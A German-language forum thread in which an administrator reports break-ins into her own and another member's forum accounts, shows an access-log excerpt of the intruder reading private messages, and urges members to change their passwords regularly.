Was heisst das für mich ? Mich mehr mit so einem Shit zu beschäftigen, um bestimmte Vorkehrungen treffen zu können.

Denn wie heisst das so schoen ? Nur wenn man weiß wie der andere riecht, erkennt man ihn auch mit verbundenen Augen.

Sollten dazu noch fragen sein dann schlage ich vor das ihr einen Thread dazu im Bereich " Probleme und Fragen " eröffnet.

Liebes Grüßle
Anima
Anima
Liebe Mitglieder

Auch wenn niemand garantieren und behaupten kann, seine Software, sein Betriebssystem oder sein Forum sei sicher, würde ich jetzt sagen, wenn man mir das nicht als Anstiftung zu einer Straftat auslegen könnte, kommt das Forum ist sicher.

Weder das eine noch das andere kann und möchte ich sagen. Was ich sehr wohl sagen kann ist, das Forum ist wesentlich sicherer geworden ist und auch in Zukunft viel an der Sicherheit getan wird.

Das ist aber jetzt nicht der Grund warum ich dennoch in diesem Thread hier schreibe.

Mir wurden heute Informationen zugetragen wonach ein User behauptete, er würde nach wie vor, an Informationen gelangen über einen Illegalen Zugriff aufs Forum . Ich kann euch beruhigen, weil diese Informationen falsch sind und eher in die Kategorie „Der schlechteste Fake aller Zeiten“ passen würde.

Wenn also auch Sie zu den betroffenen gehören, denen so was gesagt wurde, sich aber unsicher sind, denen möchte ich bitten sich bei mir zu melden.

In diesem Sinne
einen lieben Gruß
Anima
Anima
Liebe Mitglieder,

es ist ja nun schon einige Tage her als hier bei uns jemand war, der dadurch auf sich aufmerksam machte in dem er Daten von uns Veröffentlichte usw usw.

Natürlich hatte das zu folge, das ich Strafanzeige erstattete und seither vergebens auf Antwort wartete. In der Zwischen Zeit fragten mich auch immer wieder mal Mitglieder des Forums, was nun daraus geworden sei

Heute erhielt ich einen Brief worin mir mitgeteilt wurde, dass das Verfahren wegen Auspähen von Daten gegen den Beschuldigten aus folgenden Gründen eingestellt wurde:

Gegen den Beschuldigten wurde wegen einer anderen Tat eine Strafe ausgesprochen, neben der die Strafe, die wegen der nunmehr angezeigten Tat verhängt werden könnte, nicht beträchtlich ins Gewicht fiele.

Zwar nicht ganz das was ich wollte aber nun, die Gerechtigkeit findet immer einen Weg doch Interessiert es mich um was für eine andere Strafe es sich hierbei handelte zumal das Strafmaß für das Ausspähen von Daten nun auch nicht grad gering ist Augenzwinkern

Lieben Gruß
WTD
Anima
Ich gebe es ja zu, das nicht immer so genau zu nehmen mit den guten Ratschlägen die ich für andere übrig habe....
So kam es auch das ich schon seit einiger Zeit mit ein und dem selben Passwort unterwegs bin und darin begründet, das es jemanden gelang sich unter meinem Account anzumelden.
Ebenso ist es möglich das die Software ein Bug beinhaltet, der mir und dem Foren Hersteller noch nicht bekannt ist.

Doch machen wir uns nichts vor, fast alles ist Daten Technisch zu knacken wenn man genügend Zeit mitbringt und wenn man über das notwendige Wissen verfügt.
Ich will jetzt niemanden beschuldigen oder gar freisprechen doch glaube ich nicht das ein ****- Born dazu im Stande wäre.

Weil mir das durchaus bewusst ist, das es immer jemanden geben kann, der es schafft, Sicherheitslücken für sich zu nutzen, vielleicht aber auch sein Leben dem Pc gewidmet hat bis die CPU und trennte, habe ich schon vor einiger Zeit, allen Mitgliedern des Teams eine eigen LogDatei zu Verfügung gestellt, weil eine Durchsuchung der LogDatei des Servers auf blauen Dunst zu Zeitintensiv geworden ist.

Es sei denn man weiß wonach man suchen muss.

So musste ich heute feststellen als ich meine dem Profile zugestellte LogDatei durcharbeitete, das am 09.10.2007 erneut jemand über meinem Account angemeldet war.
Is ja nicht so schlimm, der jenige wollte wohl nur wissen, was ich über einen *****-Born zu berichten habe, so denke ich . Sicher, er oder sie, lasen auch meine Privaten Nachrichten doch haben Sie dabei nicht viel lesen können.

So ein Pech auch, so ein Pech auch, das gewisse Informationen nicht mehr über das Forum oder über das Internet laufen, erst recht dann nicht, wenn sich ein anderer dadurch einen Vorteil verschaffen könnte.

Wie so eine Logdatei aussieht und wer sich meines Accounts ermächtigte findet ihr nachfolgend.
code: 
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:

xxx.xxx.xxx.xxx [09.10.2007 10:41:03 +0200] "GET /logout.php?u=2 HTTP/1.1
159.149.155.89 [09.10.2007 12:40:17 +0200] "GET /index.php HTTP/1.1
159.149.155.89 [09.10.2007 12:40:35 +0200] "GET /board.php?boardid=49&sid= HTTP/1.1
159.149.155.89 [09.10.2007 12:40:49 +0200] "GET /board.php?boardid=54 HTTP/1.1
159.149.155.89 [09.10.2007 12:41:11 +0200] "GET /search.php HTTP/1.1
159.149.155.89 [09.10.2007 12:41:22 +0200] "POST /search.php HTTP/1.1
159.149.155.89 [09.10.2007 12:41:25 +0200] "GET /search.php?searchid=40630 HTTP/1.1
159.149.155.89 [09.10.2007 12:41:50 +0200] "POST /search.php HTTP/1.1
159.149.155.89 [09.10.2007 12:41:53 +0200] "GET /search.php?searchid=40632 HTTP/1.1
71.237.92.167 [09.10.2007 12:45:39 +0200] "GET /pms.php HTTP/1.1
87.220.59.103 [09.10.2007 12:46:11 +0200] "GET /pms.php HTTP/1.1
87.220.59.103 [09.10.2007 12:46:29 +0200] "GET /pms.php?action=viewpm&pmid=14996&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:46:39 +0200] "GET /pms.php?action=viewpm&pmid=15024&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:47:08 +0200] "GET /pms.php?action=viewpm&pmid=16851&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:48:25 +0200] "GET /pms.php?action=viewpm&pmid=21617&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:48:40 +0200] "GET /pms.php?action=viewpm&pmid=21631&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:48:57 +0200] "GET /pms.php?action=viewpm&pmid=21638&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:49:29 +0200] "GET /pms.php?action=viewpm&pmid=21727&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:49:42 +0200] "GET /pms.php?action=viewpm&pmid=21844&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:50:05 +0200] "GET /pms.php?action=viewpm&pmid=21886&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:50:20 +0200] "GET /pms.php?action=viewpm&pmid=22033&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:50:54 +0200] "GET /pms.php?folderid=80&sid= HTTP/1.1
87.220.59.103 [09.10.2007 12:51:03 +0200] "GET /pms.php?folderid=outbox HTTP/1.1
87.220.59.103 [09.10.2007 12:51:18 +0200] "GET /pms.php?action=viewpm&pmid=21635&outbox=1 HTTP/1.1
87.220.59.103 [09.10.2007 12:51:45 +0200] "GET /pms.php?action=viewpm&pmid=21890&outbox=1 HTTP/1.1
87.220.59.103 [09.10.2007 12:52:02 +0200] "GET /pms.php?action=viewpm&pmid=22058&outbox=1 HTTP/1.1
208.64.29.34 [09.10.2007 12:52:33 +0200] "GET /pms.php HTTP/1.1
208.64.29.34 [09.10.2007 12:52:43 +0200] "GET /pms.php?action=tracking&sid= HTTP/1.1
208.64.29.34 [09.10.2007 12:54:28 +0200] "GET /search.php HTTP/1.1
208.64.29.34 [09.10.2007 12:54:52 +0200] "POST /search.php HTTP/1.1
208.64.29.34 [09.10.2007 12:54:57 +0200] "GET /search.php?searchid=40634 HTTP/1.1
208.64.29.34 [09.10.2007 12:55:20 +0200] "GET /thread.php?threadid=5789&hilight=Dark+Born HTTP/1.1
208.64.29.34 [09.10.2007 12:55:53 +0200] "GET /thread.php?threadid=5797&hilight=Dark+Born HTTP/1.1
85.25.141.60 [09.10.2007 13:03:21 +0200] "GET /search.php HTTP/1.1
85.25.141.60 [09.10.2007 13:03:35 +0200] "POST /search.php HTTP/1.1
85.25.141.60 [09.10.2007 13:03:37 +0200] "GET /search.php?searchid=40637 HTTP/1.1
85.25.141.60 [09.10.2007 13:03:50 +0200] "POST /search.php HTTP/1.1
85.25.141.60 [09.10.2007 13:03:52 +0200] "GET /search.php?searchid=40638 HTTP/1.1
85.25.141.60 [09.10.2007 13:04:01 +0200] "POST /search.php HTTP/1.1
85.25.141.60 [09.10.2007 13:04:02 +0200] "GET /search.php?searchid=40639 HTTP/1.1
85.25.141.60 [09.10.2007 13:04:36 +0200] "POST /search.php HTTP/1.1
85.25.141.60 [09.10.2007 13:04:37 +0200] "GET /search.php?searchid=40640 HTTP/1.1
88.191.15.8 [09.10.2007 13:08:17 +0200] "GET /index.php HTTP/1.1
88.191.15.8 [09.10.2007 13:08:54 +0200] "GET /board.php?boardid=24&sid= HTTP/1.1
88.191.15.8 [09.10.2007 13:09:08 +0200] "GET /thread.php?threadid=1222 HTTP/1.1
88.191.15.8 [09.10.2007 13:10:25 +0200] "GET /board.php?boardid=24 HTTP/1.1
88.191.15.8 [09.10.2007 13:10:51 +0200] "GET /thread.php?threadid=6646 HTTP/1.1
88.191.15.8 [09.10.2007 13:11:25 +0200] "GET /board.php?boardid=4 HTTP/1.1
88.191.15.8 [09.10.2007 13:11:34 +0200] "GET /board.php?boardid=23 HTTP/1.1
88.191.15.8 [09.10.2007 13:11:58 +0200] "GET /board.php?boardid=43 HTTP/1.1
88.191.15.8 [09.10.2007 13:12:03 +0200] "GET /thread.php?threadid=11 HTTP/1.1
88.191.15.8 [09.10.2007 13:13:18 +0200] "GET /board.php?boardid=23 HTTP/1.1
88.191.15.8 [09.10.2007 13:13:28 +0200] "GET /board.php?boardid=39 HTTP/1.1
88.191.15.8 [09.10.2007 13:13:39 +0200] "GET /thread.php?threadid=4980 HTTP/1.1
88.191.15.8 [09.10.2007 13:15:48 +0200] "GET /board.php?boardid=23 HTTP/1.1
88.191.15.8 [09.10.2007 13:16:43 +0200] "GET /board.php?boardid=38 HTTP/1.1
88.172.128.238 [09.10.2007 13:22:51 +0200] "GET /index.php HTTP/1.1
88.172.128.238 [09.10.2007 13:23:33 +0200] "GET /board.php?boardid=49&sid= HTTP/1.1
88.172.128.238 [09.10.2007 13:23:44 +0200] "GET /thread.php?goto=lastpost&threadid=826 HTTP/1.1
88.172.128.238 [09.10.2007 13:23:50 +0200] "GET /thread.php?postid=235384 HTTP/1.1
88.172.128.238 [09.10.2007 13:26:06 +0200] "GET /index.php HTTP/1.1
xxx.xxx.xxx.xxx [09.10.2007 17:01:09 +0200] "GET /index.php HTTP/1.1



Mal sehen was ich nun mit dieser und der Server Logdatei machen werde....so viele Möglichkeiten gibt es da ja nicht. Und Täglich grüßt das Murmeltier... großes Grinsen
Natürlich musst ich meine Heiß geliebten Passwörter wieder ändern und werde das wohl in Zunkunft wohl öfter machen müssen....wie ich das Liebe
Vielleicht gibt es auch eine mir noch nicht bekannte Sicherheitslücke, sollte es jemanden bekannt sein, bleibt mir nur zu hoffen das mich jemand darüber Informiert

Grüßle
Anima
Anima
Liebe Mitglieder,

wie mir heute bekannt wurde, hat man den Account von Damaged gehäckt. Der Grund warum ich das Schreibe ist der weil es vielleicht seien kann das dieser jenige Nachrichten versandt hat, die nicht von ihr geschrieben wurden auch wenn ich das nicht bestätigen kann.

Bestätigen kann ich nur, das der jenige, die Nachrichten von Damaged gelesen hat und das Damaged alle Rechtliche Schritte unternehmen wird die ihr möglich sind.

Bei dieser Gelegenheit möchte ich jeden nur nahe legen, immer wieder einmal das Passwort, ganz gleich ob nun hier im Forum oder auch sonst wo, zu ändern und dabei zu achten das eine ausreichende Passwortlänge mit unterschiedlichen Zeichen gewählt wird

Anima
Forensoftware: Burning Board W.T.D, entwickelt von WoltLab GmbH